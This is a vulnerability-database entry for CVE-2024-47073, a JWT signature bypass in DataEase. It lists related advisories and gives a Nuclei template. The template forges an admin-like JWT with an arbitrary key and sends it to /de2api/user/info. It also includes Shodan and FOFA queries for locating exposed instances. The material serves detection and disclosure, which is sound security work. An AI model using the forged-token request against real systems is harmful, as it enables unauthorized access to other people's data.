| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
| CVE-2024-47073 | 7 Nov 202417:34 | – | circl | |
| DataEase 数据伪造问题漏洞 | 7 Nov 202400:00 | – | cnnvd | |
| CVE-2024-47073 | 7 Nov 202417:31 | – | cve | |
| CVE-2024-47073 Dataease arbitrary interface access vulnerability | 7 Nov 202417:31 | – | cvelist | |
| CVE-2024-47073 | 7 Nov 202418:15 | – | nvd | |
| CVE-2024-47073 Dataease arbitrary interface access vulnerability | 7 Nov 202417:31 | – | osv | |
| PT-2024-32390 · Dataease · Dataease | 7 Nov 202400:00 | – | ptsecurity | |
| CVE-2024-47073 | 23 May 202509:00 | – | redhatcve | |
| CVE-2024-47073 Dataease arbitrary interface access vulnerability | 7 Nov 202417:31 | – | vulnrichment |
| Source | Link |
|---|---|
| nvd | www.nvd.nist.gov/vuln/detail/CVE-2024-47073 |
id: CVE-2024-47073
info:
name: DataEase v2.10.2 - JWT Signature Verification Bypass
author: iamnoooob,pdresearch
severity: critical
description: |
DataEase is an open source data visualization analysis tool that helps users quickly analyze data and gain insights into business trends. In affected versions, the lack of signature verification of JWT tokens allows attackers to forge JWTs, which then allow access to any interface. The vulnerability has been fixed in v2.10.2 and all users are advised to upgrade. There are no known workarounds for this vulnerability.
impact: |
Attackers can forge JWT tokens to bypass authentication and gain unauthorized access to any interface.
remediation: |
Update DataEase to version 2.10.2 or later.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2024-47073
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
cvss-score: 9.1
cve-id: CVE-2024-47073
cwe-id: CWE-347
epss-score: 0.01223
epss-percentile: 0.65124
cpe: cpe:2.3:a:dataease:dataease:*:*:*:*:*:*:*:*
metadata:
verified: true
vendor: dataease
product: dataease
shodan-query: http.html:"dataease"
fofa-query: body="dataease"
tags: cve,cve2024,dataease,jwt,vuln
variables:
payload: '{"uid":1,"oid":1,"exp":{{unix_time(1000)}}}'
token: '{{generate_jwt(payload,"HS256","random") }}'
http:
- raw:
- |
GET /de2api/user/info HTTP/1.1
Host: {{Hostname}}
X-DE-TOKEN: {{token}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- data
- '"oid":"1"'
- code
condition: and
- type: status
status:
- 200
# digest: 4a0a004730450220045ae0ce3a60f25a9a059f47b8e0ad06b719a2b425ab10a8c8b2f89fa43a8781022100853473761930aa84930d9284adc0da9e091d77745ded7f5b102dc78e169f0b88:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation